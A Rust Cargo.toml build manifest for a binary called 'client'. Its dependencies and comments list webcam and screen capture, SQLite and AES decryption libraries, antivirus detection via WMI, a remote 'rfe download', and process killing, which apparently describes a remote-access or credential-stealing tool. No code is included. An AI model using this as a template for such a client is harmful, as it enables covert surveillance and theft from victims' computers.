[package]
name    = "client"
version = "0.1.0"
edition = "2021"

[[bin]]
name = "client"
path = "src/main.rs"

[profile.release]
opt-level = 3
lto       = true
strip     = true
panic     = "abort"

[dependencies]
base64      = "0.22"
serde_json  = "1"
serde       = { version = "1.0", features = ["derive"] }
zip         = "0.6"
image       = { version = "0.25", default-features = false, features = ["jpeg"] }
nokhwa      = { version = "0.10", features = ["input-msmf"] }
rusqlite    = { version = "0.31.0", features = ["bundled"] }
aes-gcm     = "0.10.3"
aead        = "0.5.2"
chrono      = "0.4.38"
rand        = "0.8.5"

[target.'cfg(target_os = "windows")'.dependencies]
windows-sys = { version = "0.52.0", features = [
    "Win32_Foundation",
    "Win32_System_Threading",
    "Win32_System_Diagnostics_ToolHelp",
    "Win32_System_Memory",
    "Win32_System_LibraryLoader",
    "Win32_Security",
    "Win32_System_Diagnostics_Debug",
    "Win32_System_Pipes",
    "Win32_Storage_FileSystem",
    "Win32_System_IO",
    "Win32_System_SystemServices",
    "Win32_System_WindowsProgramming",
    "Win32_System_SystemInformation",
    "Win32_UI_WindowsAndMessaging",
    "Win32_UI",
	"Win32_Security_Cryptography"
] }
windows = { version = "0.58", features = [
    # GDI screen capture
    "Win32_Graphics_Gdi",
    "Win32_UI_WindowsAndMessaging",
    "Win32_Foundation",
    # Registry (sysinfo)
    "Win32_System_Registry",
    # WMI / COM (antivirus)
    "Win32_System_Com",
    "Win32_System_Wmi",
    "Win32_System_Variant",
    # WinHTTP (country lookup + rfe download)
    "Win32_Networking_WinHttp",
    # ToolHelp32 (tasklist)
    "Win32_System_Diagnostics_ToolHelp",
    # Process management (taskkill)
    "Win32_System_Threading",
    "Win32_System_ProcessStatus",
    "Win32_Storage_FileSystem",
] }